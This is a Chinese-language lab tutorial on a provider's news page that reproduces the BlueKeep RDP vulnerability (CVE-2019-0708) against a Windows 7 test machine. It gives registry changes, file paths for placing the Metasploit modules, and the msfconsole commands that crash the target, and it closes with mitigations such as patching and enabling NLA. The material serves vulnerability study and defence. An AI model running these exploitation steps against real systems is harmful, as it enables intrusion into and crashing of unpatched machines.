溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
本篇文章為大家展示了如何分析RDP終極EXP爆破漏洞CVE-2019-0708,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
CVE-2019-0708是微軟于2019年05月14日發布的一個嚴重的RDP遠程代碼執行漏洞。該漏洞無需身份認證和用戶交互,可能形成蠕蟲爆發,影響堪比wannycry。
2019年09月07日,@rapid7 在其metasploit-framework倉庫公開發布了CVE-2019-0708的利用模塊,漏洞利用工具已經開始擴散,已經構成了蠕蟲級的攻擊威脅。
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
Windows 8和Windows 10及之后版本的用戶不受此漏洞影響
由于對象指針在釋放后再次被使用而引發UAF漏洞,詳情見
https://www.anquanke.com/post/id/181577
環境準備:
win7 sp1 - 192.168.152.139
Kali 2019.4 - 192.168.152.138
1.win7 sp1 準備:
開啟3389:
打開控制面板,選擇系統和安全,選擇系統,點擊遠程設置,彈出系統屬性,點擊遠程,在遠程桌面上選擇允許運行任意版本遠程桌面的計算機連接(較不安全)。
2.Win+r,輸入cmd命令,輸入netstat -ano查看端口狀態,可以看道3389狀態是listening。
3.修改注冊表:
Win + R 輸入 regedit 進入注冊表編輯器,按以下目錄找到 fDisableCam 并將值改為0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
4.打開kali :
Kali2019版本的要下載需要的文件
可以看到有四個.rb后綴的文件,接下來將它們放至相應的目錄(rdp目錄需要自己創建)
rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd
rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
5.查看文件是否復制成功
cd /usr/share/metasploit-framework/lib/msf/core/exploit/
cd /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cd /usr/share/metasploit-framework/modules/exploit/windows/rdp/
1. 啟動msf:
Msfconsole
2.重新加載所有模塊(重要):
命令:reload_all
3.搜索漏洞模塊
search 2019_0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //使用攻擊模塊
set rhosts 192.168.152.139 //設置目標主機(win7 sp1)
set rport 3389 //設置目標端口
set target 3
4.Run 執行 win7 sp1藍屏
1.及時打對應系統的安全補丁
2.關閉3389端口或添加防火墻安全策略限制對3389端口的訪問
3.打不了補丁的可以開啟遠程桌面(網絡級別身份驗證(NLA)),可以臨時防止漏洞攻擊
上述內容就是如何分析RDP終極EXP爆破漏洞CVE-2019-0708,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
